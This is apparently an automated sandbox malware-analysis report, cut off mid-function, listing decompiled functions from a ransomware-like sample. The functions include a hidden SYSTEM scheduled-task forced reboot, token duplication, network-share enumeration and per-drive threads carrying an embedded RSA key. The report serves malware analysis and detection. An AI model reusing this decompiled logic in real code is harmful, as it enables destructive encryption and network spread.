WNetOpenEnumW.MPR(00000001,00000000,00000000,?,0000FFFF), ref: 007B75FD
GlobalAlloc.KERNELBASE(00000040,00004000,00000000,?,00000000,0000FFFF), ref: 007B7611
memset.MSVCRT ref: 007B762C
WNetEnumResourceW.MPR(0000FFFF,000000FF,00000000,00004000), ref: 007B7640
GlobalFree.KERNEL32 ref: 007B76D9
WNetCloseEnum.MPR(0000FFFF), ref: 007B76E2

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Enum$Global$AllocCloseFreeOpenResourcememset
String ID:
API String ID: 4070278229-0
Opcode ID: d030c1eadeabae9df1c37766c12aaa63266ecda7fe734fc6dbed5ce2e296ea7d
Instruction ID: 13e4684ccecbfa0db0f8e4c5f1f127c24f9c42d460684551c65d6470b43ef8b3
Opcode Fuzzy Hash: d030c1eadeabae9df1c37766c12aaa63266ecda7fe734fc6dbed5ce2e296ea7d
Instruction Fuzzy Hash: C331B072804519EFCB24AF99CC85EEEBBB9FF84308B118169F514E7250D7389E50CB61

Uniqueness

Uniqueness Score: -1.00%

Function 007B8192 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B8192() {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				struct _SYSTEMTIME _v68;
				short _v1628;
				short _v3676;
				void* _t48;
				signed int _t49;
				short _t56;
				short _t57;
				short _t58;
				short _t59;
				short _t60;
				short _t61;
				short _t62;
				short _t63;
				short _t64;
				short _t65;
				short _t66;
				short _t67;
				short _t68;
				short _t69;
				short _t70;
				short _t79;
				short _t80;
				signed int _t82;
				signed int _t84;
				short _t86;
				short _t87;
				short _t89;
				short _t90;
				short _t92;
				signed int _t98;
				signed int _t101;

				_t80 = 0;
				if(( *0x7c7bc0 & 0x00000002) != 0) {
					GetLocalTime( &_v68);
					_t48 = E007B6477();
					if(_t48 < 0xf) {
						_t48 = 0xf;
					}
					_t49 = (_v68.wMinute & 0x0000ffff) + _t48 + 3;
					_t82 = 0x3c;
					_t101 = _t49 % _t82;
					_t84 = 0x18;
					_t98 = ((_v68.wHour & 0x0000ffff) + _t49 / _t82) % _t84;
					if(GetSystemDirectoryW( &_v1628, 0x30c) != 0) {
						_t56 = 0x73;
						_v52 = _t56;
						_t57 = 0x68;
						_v50 = _t57;
						_t58 = 0x75;
						_v48 = _t58;
						_t59 = 0x74;
						_v46 = _t59;
						_t60 = 0x64;
						_v44 = _t60;
						_t61 = 0x6f;
						_v42 = _t61;
						_t62 = 0x77;
						_v40 = _t62;
						_t63 = 0x6e;
						_v38 = _t63;
						_t64 = 0x2e;
						_v36 = _t64;
						_t65 = 0x65;
						_v34 = _t65;
						_t66 = 0x78;
						_v32 = _t66;
						_t67 = 0x65;
						_v30 = _t67;
						_t68 = 0x20;
						_v28 = _t68;
						_t86 = 0x2f;
						_v26 = _t86;
						_t87 = 0x72;
						_v24 = _t87;
						_v22 = _t68;
						_t89 = 0x2f;
						_v20 = _t89;
						_t90 = 0x74;
						_v18 = _t90;
						_v16 = _t68;
						_t92 = 0x30;
						_v12 = _t68;
						_t69 = 0x2f;
						_v10 = _t69;
						_t70 = 0x66;
						_v8 = _t70;
						_v6 = 0;
						_v14 = _t92;
						if(PathAppendW( &_v1628,  &_v52) != 0) {
							wsprintfW( &_v3676, L"schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00",  &_v1628, _t98, _t101);
							_t79 = E007B7FB7( &_v3676, 0); // executed
							_t80 = _t79;
						}
					}
				}
				return _t80;
			}

0x007b819c
0x007b81a5
0x007b81af
0x007b81b5
0x007b81bd
0x007b81c1
0x007b81c1
0x007b81c8
0x007b81ce
0x007b81dd
0x007b81df
0x007b81f0
0x007b81fa
0x007b8202
0x007b8205
0x007b8209
0x007b820c
0x007b8210
0x007b8213
0x007b8217
0x007b821a
0x007b821e
0x007b8221
0x007b8225
0x007b8228
0x007b822c
0x007b822f
0x007b8233
0x007b8236
0x007b823a
0x007b823d
0x007b8241
0x007b8244
0x007b8248
0x007b824b
0x007b824f
0x007b8252
0x007b8256
0x007b825b
0x007b825f
0x007b8262
0x007b8266
0x007b8269
0x007b826f
0x007b8273
0x007b8276
0x007b827a
0x007b827d
0x007b8283
0x007b8287
0x007b828a
0x007b828e
0x007b828f
0x007b8295
0x007b8296
0x007b829c
0x007b82ab
0x007b82b7
0x007b82ce
0x007b82e0
0x007b82e5
0x007b82e5
0x007b82b7
0x007b82e8
0x007b82ed

APIs

GetLocalTime.KERNEL32(?,00000000), ref: 007B81AF

Part of subcall function 007B6477: GetTickCount.KERNEL32 ref: 007B6477

GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 007B81F2
PathAppendW.SHLWAPI(?,?), ref: 007B82AF
wsprintfW.USER32 ref: 007B82CE

Part of subcall function 007B7FB7: wsprintfW.USER32 ref: 007B7FD6
Part of subcall function 007B7FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 007B7FFA
Part of subcall function 007B7FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 007B800C
Part of subcall function 007B7FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 007B8022
Part of subcall function 007B7FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 007B8069
Part of subcall function 007B7FB7: Sleep.KERNELBASE(00000000), ref: 007B807F

Strings

schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00, xrefs: 007B82C8

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: DirectorySystemwsprintf$AppendCountCreateEnvironmentLocalPathProcessSleepTickTimeVariablelstrcat
String ID: schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
API String ID: 2586884543-3727968613
Opcode ID: 3bec61529108fbe772800c7c242ecd3c6975151aaec5f0bdf12402c011eb8388
Instruction ID: 9e651c29b978cd5037b179808eb774b5506bf61f0ef0a6e691ccde8aab50ba35
Opcode Fuzzy Hash: 3bec61529108fbe772800c7c242ecd3c6975151aaec5f0bdf12402c011eb8388
Instruction Fuzzy Hash: 7F41C426A58348A9EB10DBE4EC16BFE73B5EF84B10F10541BE604EB1D0FAB55A80C359

Uniqueness

Uniqueness Score: -1.00%

Function 007BA016 Relevance: 7.6, APIs: 5, Instructions: 90
threadCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E007BA016(void* _a7312, void* _a7316, void* _a7324) {
				short _v36;
				intOrPtr _v40;
				void* _v44;
				void* _v48;
				char _v64;
				void* __esi;
				int _t21;
				HANDLE* _t23;
				HANDLE* _t51;

				_v48 = 0;
				_v44 = 0;
				_t21 = OpenThreadToken(GetCurrentThread(), 0xb, 1,  &_v48);
				_t57 = _t21;
				if(_t21 != 0) {
					DuplicateTokenEx(_v48, 0x2000000, 0, 2, 2,  &_v44);
				}
				_v40 =  *0x7c7bb8;
				_t23 = E007B6C5F(0x24, E007B6AA8, 0, 0xffff); // executed
				_t51 = _t23;
				E007B75D8(_t51, 0); // executed
				E007B76F2(_t51); // executed
				E007B6CC8(_t51);
				_t45 = _t51;
				_t43 = E007B6B0E(_t51, _t57,  &_v64);
				if(_t28 != 0) {
					do {
						if(E007B9534( &_v36, 0, 0, 0) != 0) {
							E007B6B5F( &_v36, _t51, _t43);
							_t45 =  &_v44;
							E007B6B5F( &_v44, _v48, 0);
						}
						_v36 = 0;
					} while (E007B6AD0(_t45,  &_v36) != 0);
					E007B6B46(_t43);
				}
				if(_v48 != 0) {
					CloseHandle(_v48);
					_v48 = 0;
				}
				if(_v44 != 0) {
					CloseHandle(_v44);
				}
				return 0;
			}

0x007ba02d
0x007ba031
0x007ba03c
0x007ba042
0x007ba044
0x007ba059
0x007ba059
0x007ba071
0x007ba075
0x007ba07a
0x007ba07e
0x007ba084
0x007ba089
0x007ba093
0x007ba09a
0x007ba09e
0x007ba0a0
0x007ba0af
0x007ba0b7
0x007ba0c1
0x007ba0c5
0x007ba0c5
0x007ba0cc
0x007ba0db
0x007ba0e0
0x007ba0e0
0x007ba0ef
0x007ba0f5
0x007ba0f7
0x007ba0f7
0x007ba0ff
0x007ba105
0x007ba105
0x007ba10f

APIs

GetCurrentThread.KERNEL32 ref: 007BA035
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,007BA1D0,00000000), ref: 007BA03C
DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 007BA059
CloseHandle.KERNEL32(?,007B6AA8,00000000,00000000,00000000,00000024,007B6AA8,00000000,0000FFFF), ref: 007BA0F5
CloseHandle.KERNEL32(0000FFFF,007B6AA8,00000000,00000000,00000000,00000024,007B6AA8,00000000,0000FFFF), ref: 007BA105

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: CloseHandleThreadToken$CurrentDuplicateOpen
String ID:
API String ID: 3602278934-0
Opcode ID: ff27cb35c32adb5a3e2b54e4ddd391d417f9f7562b4ee0c7e9003471405f244f
Instruction ID: 02e52dd1f708a75a98f02ae991adb94f77d76c3457807101c4cc8f672033ea2d
Opcode Fuzzy Hash: ff27cb35c32adb5a3e2b54e4ddd391d417f9f7562b4ee0c7e9003471405f244f
Instruction Fuzzy Hash: 3D214D71508345BAD620FB659C49FABBBECEFC5710F004929B654D2061FA7CD904CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 007B9376 Relevance: 7.6, APIs: 5, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E007B9376(short* _a4, short* _a8) {
				int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v284;
				char _v548;
				char _v1068;
				intOrPtr _t19;
				short* _t20;
				char* _t25;
				void* _t31;

				_v16 =  *0x7c7b94;
				_t19 =  *0x7c3984; // 0x444ff8
				_v12 = _t19;
				_v8 = 0;
				_t20 = PathFindFileNameW(0x7c7bc8);
				if(_t20 != 0) {
					_t35 =  &_v548;
					WideCharToMultiByte(0xfde9, 0, _t20, 0xffffffff,  &_v548, 0x104, 0, 0);
					WideCharToMultiByte(0xfde9, 0, _a4, 0xffffffff,  &_v284, 0x104, 0, 0);
					_t25 =  &_v284;
					__imp__#11(_t25);
					if(_t25 != 0xffffffff || E007B9332( &_v284,  &_v284) != 0) {
						WideCharToMultiByte(0xfde9, 0, _a8, 0xffffffff,  &_v1068, 0x208, 0, 0);
						_t31 = E007B5337(_t35,  &_v284,  &_v1068,  &_v548, _v12, _v16); // executed
						if(_t31 == 0) {
							_v8 = 1;
						}
					}
				}
				return _v8;
			}

0x007b9387
0x007b938a
0x007b9396
0x007b9399
0x007b939c
0x007b93a4
0x007b93b7
0x007b93c8
0x007b93df
0x007b93e1
0x007b93e8
0x007b93f1
0x007b9418
0x007b9435
0x007b943c
0x007b943e
0x007b943e
0x007b943c
0x007b93f1
0x007b944c

APIs

PathFindFileNameW.SHLWAPI(007C7BC8,?,00000000,00000000), ref: 007B939C
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000104,00000000,00000000), ref: 007B93C8
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 007B93DF
inet_addr.WS2_32(?), ref: 007B93E8
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000208,00000000,00000000), ref: 007B9418

Part of subcall function 007B9332: gethostbyname.WS2_32(007B93FF), ref: 007B933B
Part of subcall function 007B9332: wsprintfA.USER32 ref: 007B9365

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide$FileFindNamePathgethostbynameinet_addrwsprintf
String ID:
API String ID: 3160354238-0
Opcode ID: 001c24a362a974d53f321b4440a61dbcbec19d63fd106750482f60a58ac2a39e
Instruction ID: 65252dcf67edd1f11ab72e981476de3c3ed50822fbce811fdc0936a1424032b0
Opcode Fuzzy Hash: 001c24a362a974d53f321b4440a61dbcbec19d63fd106750482f60a58ac2a39e
Instruction Fuzzy Hash: 1E21EDB290011CBEDB50DB949C85EEF77BCEB04364F5042A9B724D2190DA789E459B60

Uniqueness

Uniqueness Score: -1.00%

Function 007B6C5F Relevance: 7.5, APIs: 5, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007B6C5F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				void* __esi;
				signed int _t14;
				void* _t17;
				struct _CRITICAL_SECTION* _t24;

				_t24 = HeapAlloc(GetProcessHeap(), 8, 0x34);
				if(_t24 != 0) {
					InitializeCriticalSection(_t24);
					_t14 = _a16;
					 *(_t24 + 0x20) = _t14;
					 *((intOrPtr*)(_t24 + 0x1c)) = _a4;
					 *((intOrPtr*)(_t24 + 0x2c)) = _a8;
					_t22 = _a12;
					 *((intOrPtr*)(_t24 + 0x24)) = 0;
					 *((intOrPtr*)(_t24 + 0x30)) = _a12;
					_t17 = RtlAllocateHeap(GetProcessHeap(), 8, _t14 << 2); // executed
					 *(_t24 + 0x18) = _t17;
					if(_t17 == 0) {
						E007B6BD1(_t22, _t24);
						_t24 = 0;
					}
				}
				return _t24;
			}

0x007b6c7a
0x007b6c7e
0x007b6c81
0x007b6c87
0x007b6c8d
0x007b6c90
0x007b6c99
0x007b6c9c
0x007b6ca2
0x007b6ca9
0x007b6caf
0x007b6cb1
0x007b6cb6
0x007b6cb8
0x007b6cbd
0x007b6cbd
0x007b6cb6
0x007b6cc5

APIs

GetProcessHeap.KERNEL32(00000008,00000034,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C6F
HeapAlloc.KERNEL32(00000000,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C78
InitializeCriticalSection.KERNEL32(00000000,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C81
GetProcessHeap.KERNEL32(00000008,00000000,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6CAC
RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6CAF

Part of subcall function 007B6BD1: GetProcessHeap.KERNEL32(00000000,?,74654F20,77D74620,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C29
Part of subcall function 007B6BD1: HeapFree.KERNEL32(00000000,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C2C
Part of subcall function 007B6BD1: GetProcessHeap.KERNEL32(00000000,?,74654F20,77D74620,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C39
Part of subcall function 007B6BD1: HeapFree.KERNEL32(00000000,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C3C
Part of subcall function 007B6BD1: GetProcessHeap.KERNEL32(00000000,?,74654F20,77D74620,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C4E
Part of subcall function 007B6BD1: HeapFree.KERNEL32(00000000,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C51
Part of subcall function 007B6BD1: GetProcessHeap.KERNEL32(00000000,00000000,74654F20,77D74620,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C56
Part of subcall function 007B6BD1: HeapFree.KERNEL32(00000000,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C59

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$Free$AllocAllocateCriticalInitializeSection
String ID:
API String ID: 1652351593-0
Opcode ID: 0c0c816fae249d5fa51e21ce182c9fbed799020e361758836466e62e0681f147
Instruction ID: cf0c8bc80afb2d9a372eeabd846f22c5ac3286b118fd02786b030e6d8f64bbd8
Opcode Fuzzy Hash: 0c0c816fae249d5fa51e21ce182c9fbed799020e361758836466e62e0681f147
Instruction Fuzzy Hash: BE01FB71600719ABD324DFAADC54F5BBBE8FF48750F05461AFA89D7740DA78E8008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 007B636B Relevance: 6.1, APIs: 4, Instructions: 66
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E007B636B(void* _a4, intOrPtr _a8) {
				signed char _v8;
				signed int _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				long _t24;
				void* _t27;
				short _t30;
				short _t31;
				void* _t34;
				void _t35;
				signed char _t36;
				signed int _t40;
				void* _t47;

				_t35 =  *0x7c7bbc;
				_t24 = GetLogicalDrives(); // executed
				_v12 = _t24;
				_v8 = 0x1f;
				do {
					_t36 = _v8;
					_t27 = 1 << _t36;
					if((_v12 & 1) != 0) {
						_v20 = _t36 + 0x41;
						_t30 = 0x3a;
						_v18 = _t30;
						_t31 = 0x5c;
						_v16 = _t31;
						_v14 = 0;
						_t27 = GetDriveTypeW( &_v20); // executed
						if(_t27 == 3) {
							_t27 = LocalAlloc(0x40, 0x50);
							if(_t27 != 0) {
								 *((intOrPtr*)(_t27 + 0x4c)) = _a8;
								 *_t27 = _t35;
								 *(_t27 + 0x34) = L"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB";
								 *(_t27 + 4) = _v20;
								 *((intOrPtr*)(_t27 + 8)) = _v16;
								_t40 = 8;
								_t20 = _t27 + 0xc; // 0xc
								_t34 = memcpy(_t20, _a4, _t40 << 2);
								_t47 = _t47 + 0xc;
								asm("movsb"); // executed
								_t27 = CreateThread(0, 0, E007B6299, _t34, 0, 0); // executed
							}
						}
					}
					_t22 =  &_v8;
					 *_t22 = _v8 - 1;
				} while ( *_t22 >= 0);
				return _t27;
			}

0x007b6372
0x007b637a
0x007b6380
0x007b6383
0x007b638a
0x007b638a
0x007b6390
0x007b6395
0x007b639e
0x007b63a2
0x007b63a3
0x007b63a9
0x007b63aa
0x007b63b0
0x007b63b8
0x007b63c1
0x007b63c7
0x007b63d1
0x007b63d9
0x007b63dc
0x007b63de
0x007b63ea
0x007b63f0
0x007b63f3
0x007b63f4
0x007b63f8
0x007b63f8
0x007b6403
0x007b6404
0x007b6404
0x007b63d1
0x007b63c1
0x007b640a
0x007b640a
0x007b640a
0x007b6417

APIs

GetLogicalDrives.KERNELBASE ref: 007B637A
GetDriveTypeW.KERNELBASE(?), ref: 007B63B8
LocalAlloc.KERNEL32(00000040,00000050), ref: 007B63C7
CreateThread.KERNELBASE ref: 007B6404

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: AllocCreateDriveDrivesLocalLogicalThreadType
String ID:
API String ID: 2320387513-0
Opcode ID: 3dca53d2cff93ec15b3229665706cd1ae63f38fb160106f9420f7a4cf7471b24
Instruction ID: c868f63876435ac23b87158b2c64b065babf987cf377b77623cd04c113fd923f
Opcode Fuzzy Hash: 3dca53d2cff93ec15b3229665706cd1ae63f38fb160106f9420f7a4cf7471b24
Instruction Fuzzy Hash: 57115C75A00208AFDB00DFA8D845EAEB7B5FF88710F15C46AE605EB291D7389A45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 007BA333 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48
memorysleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007BA333(void* __eflags, void* _a4) {
				short _v36;
				void* _t13;
				void* _t24;
				void* _t32;

				_t32 = __eflags;
				_t24 = _a4;
				Sleep( *_t24); // executed
				_t27 =  *0x7c7bb8;
				_t22 =  *0x7c7bb8;
				_t20 = E007B6B0E(_t27, _t32,  &_v36);
				if(_t8 != 0) {
					do {
						_t13 = E007B9F27( &_v36); // executed
						if(_t13 != 0) {
							_t22 =  &_v36;
							E007B6B5F( &_v36, _t27, _t20);
						}
						_v36 = 0;
					} while (E007B6AD0(_t22,  &_v36) != 0);
					E007B6B46(_t20);
				}
				HeapFree(GetProcessHeap(), 0, _t24);
				return 0;
			}

0x007ba333
0x007ba33f
0x007ba344
0x007ba34a
0x007ba355
0x007ba35c
0x007ba360
0x007ba362
0x007ba367
0x007ba36e
0x007ba372
0x007ba376
0x007ba376
0x007ba37d
0x007ba38c
0x007ba391
0x007ba391
0x007ba3a0
0x007ba3ae

APIs

Sleep.KERNELBASE(?), ref: 007BA344
GetProcessHeap.KERNEL32(00000000,?,?), ref: 007BA399
HeapFree.KERNEL32(00000000), ref: 007BA3A0

Strings

Oet Uet0Xet, xrefs: 007BA399

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$FreeProcessSleep
String ID: Oet Uet0Xet
API String ID: 1803097132-3175316637
Opcode ID: 99d820d1101b4760679e0e4b304514107f090caa1c0bffdc9915b8c046f385f2
Instruction ID: 679a4e88807e3692ce26d1d978d66cb3567bdf9726ded16b871b219055be2cee
Opcode Fuzzy Hash: 99d820d1101b4760679e0e4b304514107f090caa1c0bffdc9915b8c046f385f2
Instruction Fuzzy Hash: 7D012CB2504246ABC710EFB59C89EEBB7ACEB84310F044929BA15D3051EB28D914C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 007BA112 Relevance: 5.1, APIs: 4, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E007BA112(void* __ecx, void* _a4, void* _a7352) {
				intOrPtr _v8;
				void _v12;
				intOrPtr _t10;
				void* _t16;
				void* _t21;
				intOrPtr _t27;
				void* _t31;

				_t21 = _a4;
				if(_t21 != 0) {
					_t31 =  *(_t21 + 4);
					_t27 =  *0x7c7b88;
					_v12 =  *_t21;
					_v8 =  *0x7c7bb8;
					_t10 =  *0x7c7b80;
					_t37 = _t10;
					if(_t10 == 0 || E007B9F7A(__ecx, _t37, _t31, _t10) == 0) {
						_t39 = _t27;
						if(_t27 == 0 || E007B98AB(_t39, _t31, _t27) == 0) {
							if(_v12 != 0) {
								_t16 = E007B9534(_t31, 0, 0, 0); // executed
								if(_t16 != 0) {
									goto L7;
								}
							}
						} else {
							goto L7;
						}
					} else {
						L7:
						E007B6B5F(_t31, _v8, 0);
					}
					HeapFree(GetProcessHeap(), 0, _t31);
					HeapFree(GetProcessHeap(), 0, _t21);
				}
				return 0;
			}

0x007ba11c
0x007ba123
0x007ba127
0x007ba12a
0x007ba130
0x007ba139
0x007ba13d
0x007ba142
0x007ba144
0x007ba151
0x007ba153
0x007ba166
0x007ba16c
0x007ba173
0x00000000
0x00000000
0x007ba173
0x00000000
0x00000000
0x00000000
0x007ba175
0x007ba175
0x007ba17d
0x007ba17d
0x007ba194
0x007ba19c
0x007ba19c
0x007ba1a6

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 007BA18B
HeapFree.KERNEL32(00000000), ref: 007BA194
GetProcessHeap.KERNEL32(00000000,?), ref: 007BA199
HeapFree.KERNEL32(00000000), ref: 007BA19C

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 2c2d78ee93ae6276c0319a679aa46fb3d21fd1a275e290a75c5714d769b0bef4
Instruction ID: a233fe5160e543dfab55ce4a6f097cee206d3eff0bb945dc34cd5793f27e85dc
Opcode Fuzzy Hash: 2c2d78ee93ae6276c0319a679aa46fb3d21fd1a275e290a75c5714d769b0bef4
Instruction Fuzzy Hash: 9C11C2B26043197BD750BE6D9C44FAB77ACAB84320F004129FE14D3240EB28DD01CAB6

Uniqueness

Uniqueness Score: -1.00%

Function 007B7E8E Relevance: 4.5, APIs: 3, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E007B7E8E(void* __ecx, void* __eflags) {
				void* _v8;
				void* _v12;
				short _v1572;
				void* __ebx;
				int _t12;
				signed int _t16;
				void* _t20;
				int _t22;
				void* _t26;
				int _t27;

				_t26 = __ecx;
				_t27 = 0;
